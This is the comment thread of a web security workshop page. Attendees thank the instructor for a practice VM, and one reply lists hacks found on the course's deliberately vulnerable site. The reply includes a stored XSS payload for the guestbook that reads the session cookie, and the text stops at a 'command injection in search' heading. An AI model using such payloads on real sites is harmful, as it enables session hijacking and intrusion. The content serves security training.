Hacking Sites for Fun and Profit


Comments are closed.

Anonymous at 11:09 on 9 May 2015

Great course!

There was so much thought put into this workshop. Thank you!

The example VM was extremely helpful in allowing us to inspect bad practices and possible vulnerabilities.

Hi David,

Really enjoyed your class. Hey, during the class itself you were keeping track of all the hacks we found for your Cheese site. Can you provide that document to me or direct me where I can get it? I was showing this information to some co-workers and couldn't remember all the hacks we did on the Search box.


John Kallen

@John Kallen: I think this is what you are looking for:

XSS in guestbook

Enter this as a guestbook entry:

Nothing to see here....
<script type='text/javascript'>alert('pwned your sessionID is '+document.cookie.substring(11));</script>

Command injection in search: